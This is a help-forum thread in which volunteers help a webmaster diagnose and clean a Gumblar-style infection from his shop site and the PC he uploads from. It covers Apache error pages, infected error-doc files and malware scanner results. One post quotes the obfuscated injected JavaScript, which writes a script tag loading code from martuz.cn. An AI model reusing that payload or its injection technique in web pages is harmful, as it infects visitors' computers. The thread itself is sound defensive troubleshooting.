Hello Eduardo,
I did a full scan of your site and found malicious code on at least some pages. For example: giardino.nl/load_switchcurrency.html, giardino.nl/load_search.html, and giardino.nl/front.html.
You can see the results of my scan here: http://www.blacklistdoctor.com/bld/get_full_scan_results.php?full_scan_id=9052&sig=a220614a045e3108104e13055c5fa5c9cf8768e5
I also manually downloaded the load_switchcurrency.html, and saw that there is malicious code between the </head> tag and the <body> tag (lines 5-7). This malicious code conforms to what the BlacklistDoctor report also pointed to: “
LXSE)…” The page gives a 404 error, but the malicious script is still there.
If you are unable to see the code on the page, it may be because what the user (or Google) sees in a browser is different than the file you have on disk. This could be the case if your page is being generated dynamically (although these pages all have a .html extension, so it’s not clear that they are dynamic pages). You may need to check for the malware in your backend database or on the server itself. Your hosting provider should be able to help you with this.
Best,
Ameet
Hello Ameet
Thank you for scanning my site.
In my hosting package I use PLESK, So I have the ability to edit files online.
However I wonder, If I publish my site ( I use Shopfactory) again after I have remove these codes. The codes wil return.
I check your findings now.
I let you know
Regards Eduardo
Eduardo,
Ameet’s comment made me think of something. He’s not downloading those pages, any 404 error on your site links to martuz.cn.
I think if you look for those pages, you won’t find them. That’s why they return a 404 error.
We tried, http://www.giardino.nl/john_doe.html and we got the same result as the Blacklistdoctor scan Ameet did:
(function(LXSE){eval(unescape((‘va#72#20a#3d#22Scr#69#70tEngine#22#2cb#3d#22Ve#72sion()
<ins>#22#2c#6a#3d#22#22#2c#75#3dnavi#67ator#2euserA#67e#6et#3bif(#28u#2e
inde#78O#66#28#22C#68ro#6de#22)#3c0#29#26#26(u#2ei#6edexOf(#22W#69n#22
#29#3e#30)#26#26(#75#2ein#64ex#4f#66#28#22#4eT#206#22)#3c0)#26#26(doc
#75me#6et#2ec#6fo#6b#69e#2eind#65xOf(#22m#69ek#3d1#22#29#3c0#29#26#26
#28typ#65#6ff#28#7a#72#76zts)#21#3dtype#6f#66(#22A#22)))#7bzr#76#7ats#3d
#22A#22#3be#76al(#22if(wi#6edow#2e#22#2ba#2b#22#29j#3dj</ins>#22+#61+
#22Major#22+b+#61+#22Minor#22+#62+a+#22#42uild#22#2bb#2b#22j#3b#22)
#3bdoc#75ment#2e#77#72ite#28#22#3cs#63ript#20#73r#63#3d#2f#2fm#61rtu#22
#2b#22#7a#2ecn#2fvid#2f#3f#69d#3d#22+j+#22#3e#3c#5c#2fs#63ript#3e#22)#3b
#7d’).replace(LXSE,‘%’)))})(/\#/g);
If you’re on an Apache server, check your httpd.conf file for a line like:
ErrorDocument 404 /404.html
Or some other line of text after ErrorDocument. If you’re not on a dedicated server, then contact your hosting provider immediately and have them check it out for you.
Ameet, thank you for elaborating on your findings.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
The particular “infection” you are experiencing is usually happening at the source of the uploading process. i.e. the PC uploading the contents to the site. This computer should be checked for malware like keyloggers or viral infections that may cause the site to be reinfected.
The “infection” itself, hides in most files on the webserver, including the error documents, but also script files.
All html/php/shtml documents have the infection inserted between the /head and body tags.
Script files are infected at the end of the files.
Error documents 404/500 etc. are infected like normal html files.
Cometcom1, Eduardo is on an Apache server and if you notice, the error page doesn’t redirect to a 404.html, the URL shows the page you’ve requested but as a default error page.
I don’t claim to be an Apache expert, but from what I’ve been able to read online, you can create “custom” 404 pages in Apache, but I believe it then redirects to that page when a non-existing page is requested. In this case, it seems like the server is building the default 404 page from information in a config file.
I might be wrong, but I don’t think that the there is a 404.html page with the infectious code in it. Anyway to verify? Is Eduardo still here???
Any Apache experts reading this?
Let us know. Inquiring minds want to know.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
Sorry to reply to my own post, but upon further research (and finally an answer from “phone a friend”), here is how Apache handles errors:
In the event of a problem or error, Apache can be configured to do one of four things,
1. output a simple hardcoded error message 2. output a customized message 3. redirect to a local URL-path to handle the problem/error 4. redirect to an external URL to handle the problem/errorIt seems from the results that #2 might be at work here. Like I said before, it doesn’t appear to be redirecting to a 404.html or some other 404 page. It’s returning a customized message that includes the malscript.
I’m not looking to be right or wrong here, just trying to figure this out.
Anyone have any insight into this?
Oh, that document 404, is the standard html document of the apache httpd server.
It is located in the server installation (bin) folders – subfolder error and the name is:
HTTP_NOT_FOUND.html.var
There are multiple files in that folder which should be checked.
also there is an include folder with additional html that should be validated as well.
If you look for a way which is detecting if the “virus” has attached itself to your computer, you may want to read this article:
http://badwarebusters.org/main/itemview/4021
This is one of the indicators that might show if you’re infected with this particular malware.
I have compare my files with my other hosting names (PLEX ). to the default folders & files to.
The default folder (error docs) contains the following files which I have compared with other domijn names. 14 files
bad_gateway.html , bad_request.html , forbidden.html , internal_server_error.html , method_not_allowed.html , not_acceptable.html , not_found.html , not_implemented.html , precondition_failed.html , proxy_authentication_required.html , request-uri_too_long.html , unauthorized.html , unsupported_media_type.html ,
the files are equal for each hosting account, however the giardino above files have all the following code between Head and Body.
</head>
<body>
I think this is the cause ?
@ Cometcom1
I read the article and followed the steps.
To my surprise i have found 5 sqlsodbc.chm files: See below
sqlsodbc.chm
sqlsodbc.chmxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
sqlsodbc.chmxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
sqlsodbc.chmxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
sqlsodbc.chmxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
I compared this with the database from Scansafe.com, The SHA1 number series dont mach, therefore likely its it is possible
that it is a Gumblar virus.
I cannot find if it is possible to delete those files manualy. I’ve tried with norton, After the scan, indicates that no virus alert.
Best regards Eduardo
Eduardo,
Good, at least we’re now reasonably sure what is going on. Now for the hard part, which you might not like, because I’m going to challenge the experts that just convinced you that you have the gumblar virus.
Now according to the “experts”, the way to fix your computer is a total reinstall … I challenge that statement and beleive it’s possible to do without having to go all the way of reinstalling.
We’ve had reports that some webmasters have had luck removing the threat using a combination of the tools available on this site, and I really would like to get to know how to remove this thing.
You should run the various online scanners and try to identify every bit of malware that you have. Unfortunately neither Malwarebytes nor Norton 360 can detect everything, so you have to combine.
This posting will show you a list of the tools recommended by the community and these have been succesful in the past removing the threat:
http://badwarebusters.org/main/itemview/1659#itemblock-3035
Run the various scanners and let us know what is found and if you can’t remove everything, then I’d be happy to assist in any way I can. – And don’t worry about the time difference – there’s none, I’m actually located in Denmark, so we’re both on CET.
The files shown and indicating the malware, are not the only files and there might be a lot more hiding around the system. You’re unlikely going to be able to delete these files, but you may be able to find replacement files in your backup folders.
Give it a try, and let’s get the PC disinfected, otherwise the malware will return to your site.
Trend Micro HouseCall: dont Works for me; during the scan it stops.
Microsoft Windows Live OneCare: only find cookies
Microsoft Windows Defender: Wrks only for vista , i m running XP
CA. Inc Threat Scanner: found: Haxdoor E
Threat level high , overal risk : Critical,
The program has not a delete function.
I went to the symantec site, downloaded , trojan.schoeber and backdoor.haxdoor.sremoval tool.
this is now running. let’s see what happens.
Results: Trojan.Schoeberl.E and Backdoor.Haxdoor.S has not been found on your computer.
process: iexplore.exe (terminated)
process: iexplore.exe (terminated)
process: iexplore.exe (WARNING: can’t be manipulated)
process: iexplore.exe (WARNING: can’t be manipulated)
process: iexplore.exe (terminated)
process: iexplore.exe (terminated)
process: iexplore.exe (WARNING: can’t be manipulated)
